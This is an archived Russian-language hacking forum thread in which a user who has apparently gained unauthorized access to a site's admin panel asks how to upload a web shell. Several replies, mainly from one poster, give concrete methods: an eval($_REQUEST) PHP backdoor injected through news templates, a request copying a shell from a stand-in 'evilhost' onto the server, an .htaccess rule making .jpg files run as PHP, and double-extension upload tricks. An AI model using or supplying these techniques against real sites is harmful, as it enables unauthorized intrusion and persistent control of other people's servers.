PDA

Просмотр полной версии : Заливка шелла через правку html

Rasta18
28.12.2013, 17:29
Вчера попал в админку.

А в ней можно только новости в html редактировать, ток вот я попробывал вставить:

Загрузка файлов

PHP:

Отправка файла на серве р

форма отображается на странице

но файлы я так понял всё равно не загружаются... думаю прав нет.

Есть ещё варианты для загрузки шелла через html ?

wkar
28.12.2013, 18:21
Rasta18 said:
Вчера попал в админку.
А в ней можно только новости в html редактировать, ток вот я попробывал вставить:
Загрузка файлов

PHP:

Отправка файла на серве р

форма отображается на странице
но файлы я так понял всё равно не загружаются... думаю прав нет.
Есть ещё варианты для загрузки шелла через html ?

вариантов вообше нет

Konqi
28.12.2013, 18:28
жжЁте

по вашему файл сам себя будет копировать на жесткий диск? вы же не обрабатываете файл на стороне сервера

Inoms
28.12.2013, 19:20
Дык для того, чтобы принять этот файл, на той странице, куда он отправляется (текущей) должен быть и обработчик, не так ли ? Так вы стучите пальцем об стену.

Rasta18
29.12.2013, 03:34
Inoms said:
Дык для того, чтобы принять этот файл, на той странице, куда он отправляется (текущей) должен быть и обработчик, не так ли ? Так вы стучите пальцем об стену.

Видимо именно так.

Неужели действительно нет вариантов??

Konqi
29.12.2013, 18:00
Rasta18 said:
Видимо именно так.
Неужели действительно нет вариантов??

нет.

next
29.12.2013, 18:03
Варианты может и есть просто не через правку новостей

Может в админе есть заливка картинок или других файлов ?

Rasta18
29.12.2013, 21:33
next said:
Варианты может и есть просто не через правку новостей
Может в админе есть заливка картинок или других файлов ?

заливка картинок есть, но я к примеру заливаю даже картинку image.gif, а на сервере она сохраняется как 29120000.jpg

это можно обойти?

Inoms
29.12.2013, 21:47
Rasta18 said:
заливка картинок есть, но я к примеру заливаю даже картинку image.gif, а на сервере она сохраняется как 29120000.jpg
это можно обойти?

Увы. Lfi там случаем нигде нет с возможностью обрезки расширений ? так бы у вас был единственный шанс выполнить там шелл.

Rasta18
29.12.2013, 22:25
Inoms said:
Увы. Lfi там случаем нигде нет с возможностью обрезки расширений ? так бы у вас был единственный шанс выполнить там шелл.

думаю нет.

так как все странички сайта на html, но у меня когда-то доступ к нему был и знаю что оболочка вся на php, ничего кроме xss там не нашлось

Take_IT
30.12.2013, 00:24
Уважаемый ТС, хочу обратить Ваше внимание на одну мелочь - Варианты есть всегда (с)

Что за движок?

можно попробовать вставить php код с бекдором:

PHP:
@php

eval($_REQUEST[e]);

php@

Смотрим абсолютный путь:

HTML:
localhost/?e=phpinfo();

Льем шелл:

HTML:
yoursite.com/news/1.html?e=copy("evilhost/shell.txt","/home/yoursite/shell.php");

Это в свое время сработало на PHPShop CMS, кстати не так давно....

Это как вариант номер раз)

Вариант номер 2.1:

Можно попробовать залить вместо картинки файл shell.php.jpg , допустим обработчик переименует его в 12312312312.php.jpg - это может прокатить, при определенных конфигах сервера....

Вариант 2.2:

Также можно попробовать залить shell.jpg

Предварительно залив .htaccess следующего содержания:

HTML:
AddType application/x-httpd-php .jpg

Тогда сервер будет обрабатывать .jpg файлы как приложение php и переименованный шелл с новым названием 123123123123.jpg отработает как пых файл)

Вариант 2.3:

Попробуй залить файл shell.php.g1f или shell.php.ololo

файл shell.php.ololo имеет неизвестный формат, т.к. апачу не знакомо расширение .ololo он начнет обрабатывать наш шелл как PHP файл.

PS а вообще, я уверен, что это далеко не все способы которые можно попробовать заливаясь из админки...

Konqi
30.12.2013, 15:09
умники собрались

Тake_IT

"@php

eval($_REQUEST[e]);

php@ "

ты где встречал такие теги "@php php@" ?

если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать.

тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс?

"12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...."

ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php

такие методы могут сработать в конкретных двигах, но в общем случай писать о них как о методах заливки шелла это глупо.

Take_IT
30.12.2013, 22:58
Konqi said:
умники собрались

Раньше ты попроще был))

Konqi said:
"@php
eval($_REQUEST[e]);
php@ "
ты где встречал такие теги "@php php@" ?
если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать.

эти теги я встречал минимум в 3 движках phpshop cms , Instant Update CMS, Blox CMS, могу еще вспомнить....

Konqi said:
тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс?

учитывая то, что ТС совсем зеленый, я предположил что он может не совсем правильно описывать ситуацию, в частности, с загрузкой файлов. поэтому решил напомнить про несколько несложных методов)

Konqi said:
"12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...."
ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php
такие методы могут сработать в конкретных двигах
, но в общем случай писать о них как о методах заливки шелла это глупо.

случаев когда файлы .php.gif запускаются - масса, на моей памяти это примерно 15-20%

в конкретных двигах говорите?) а мы знаем с каким двигом столкнулся ТС ? а вдруг это тот самый, "конкретный"??

PS мне кажется от твоего совета было бы больше проку, чем от критики)

Konqi
31.12.2013, 05:06
Take_IT said:
Раньше ты попроще был))
а ты наверное с другого акка сидел.
PS мне кажется от твоего совета было бы больше проку, чем от критики)

я выше уже отписался, что если нету конкретной инфы о двиге, то не имеет смысла описать какие то левые методы которые работают с очень низкой частотой

Take_IT
31.12.2013, 11:54
Konqi said:
я выше уже отписался, что если нету конкретной инфы о двиге, то не имеет смысла описать какие то левые методы которые работают с очень низкой частотой

ну извините бл* )) если случаев, когда .php.gif обрабатывается как пхп 15-20% (1 из 5\6 - оказывается для тебя этого мало) , то этими способами похекалось минимум половина всех CMS которые я изучал)) а ты говоришь про низкую частоту...

PS ага, пароль потерял, давно не заходил сюда)

BigBear
31.12.2013, 14:49
Take_IT said:
ну извините бл* )) если случаев, когда .php.gif обрабатывается как пхп 15-20% (1 из 5\6 - оказывается для тебя этого мало) , то этими способами похекалось минимум половина всех CMS которые я изучал)) а ты говоришь про низкую частоту...
PS ага, пароль потерял, давно не заходил сюда)

Бред пишешь. Если " .php.gif обрабатывается как пхп 15-20%" это всего лишь означает, что эти 20% были похеканы кем-то ранее. Ни одна нормальная CMS (без бэкдоров), ни один адекватный админ (не обкуренный) не позволит выполняться картинкам как пхп-код.

Что-то прям из научной фантастики. Я согласен ещё на .ololo с натяжкой - да, встречается. Но вышепредложенное - вообще бред чистой воды.

З.Ы. А залейте вообще *.txt. Вдруг выполнится как php? Ну а вдруг?

Take_IT
31.12.2013, 17:36
опачки! одепты подтянулись)))

Ох, ну ничего себе кто меня учить собрался))))

BigBear said:
Бред пишешь. Если " .php.gif обрабатывается как пхп 15-20%" это всего лишь означает, что эти 20% были похеканы кем-то ранее. Ни одна нормальная CMS (без бэкдоров), ни один адекватный админ (не обкуренный) не позволит выполняться картинкам как пхп-код.

да я и не утверждаю что нормальный человек так настроит сервер суть не в том из за чего это работает(админ дурак или серв похекали раньше), суть в том, что это работает(фактически) и с достаточно большой вероятностью, пусть это будет даже 1 сервер из 10...

А про то, как в нормальных CMS появляются бекдоры, я расскажу немного позже) как раз снял видео на эту тему

BigBear said:
Что-то прям из научной фантастики. Я согласен ещё на .ololo с натяжкой - да, встречается. Но вышепредложенное - вообще бред чистой воды.

с натяжкой?) а объясни почему это сработает не всегда и почему вообще работает?)

file.php.ololo имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать file.php.ololo точно также как и file.php. а знаешь почему?? потому, что в случае если апач встречает файл с незнакомым расширением он начинает искать знакомое расширение с конца имени файла, т.е. фактически, если бы мы залилиfile.php.txt.ololo он бы выполнился как .txt. А не сработает это в том случае, если в дире куда льем файл не выполняется пых

Зы вам че, квестики перестали делать?)) плохо, мозги как и мышцы надо тренировать))) И кстати, если для тебя вышеописанное фантастика, почитай хоть темы роа за 2009-2011 года, помнится там было много примеров)

BigBear said:
З.Ы. А залейте вообще *.txt. Вдруг выполнится как php? Ну а вдруг?

троллинг не засчитан, тренируйтесь лучше на кошках (с)

Konqi
31.12.2013, 17:44
Take_IT said:
file.php.ololo
имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать
file.php.ololo
точно также как и
file.php

http://screenshotuploader.com/i/1312/79zyz.png

Take_IT
31.12.2013, 17:55
Konqi said:
http://screenshotuploader.com/i/1312/79zyz.png

пардон, я не говорю что от этого нет никакой защиты и это работает в 100%, но ведь на локалке, в искусственных условиях, можно добиться самого разного результата и сделать что угодно)

Unknown
31.12.2013, 18:00
Какие там требования чтоб file.php.unknown_extension выполнялся как .php напомните пожалуйста.

mod_mime enabled кажется, и что-то ещё видимо. У меня на локалке mod_mime вроде стоит, а код не выполняется.

Konqi
31.12.2013, 18:03
Take_IT said:
пардон, я не говорю что от этого нет никакой защиты и это работает в 100%, но ведь на локалке, в искусственных условиях, можно добиться самого разного результата и сделать что угодно)

я никакой защиты не ставил,

но ведь на локалке, в искусственных условиях

у меня дефолтные настройки апача, никаких искуственных условий

просто ты утверждаешь что такие фичи работают на многих серверах и не по ошибке админа. а мы говорим нет - как заметил бигбир такое бывает или в тех случаях когда сайт уже был похекан, или же когда админ обкуренный

Take_IT
31.12.2013, 18:10
Konqi said:
я никакой защиты не ставил,
у меня дефолтные настройки апача, никаких искуственных условий
просто ты утверждаешь что такие фичи работают на многих серверах и не по ошибке админа. а мы говорим нет - как заметил бигбир такое бывает или в тех случаях когда сайт уже был похекан, или же когда админ обкуренный

да я как бы с вами и не спорю просто дискуссия началась с того, что меня "назвали дураком" грубо говоря...))) мол, "к чему ты это написал вообще" . вот я и пытаюсь объяснить свою позицию в отношении того, почему я порекомендовал данный вариант - лишь потому, что в определенном ряде случаев это помогает добиться фактического результата) и нет никакой уверенности в том, что админ целевого сервера не курит))

тс просил не разжевать ему теорию, а дать практический совет который помог бы ему залиться в данном случае! С учетом того, что в его ситуации практически не из чего выбирать я посоветовал ему эти способы)

дико извиняюсь, если кого то это затронуло за живое

ЗЫ всех с Наступающим))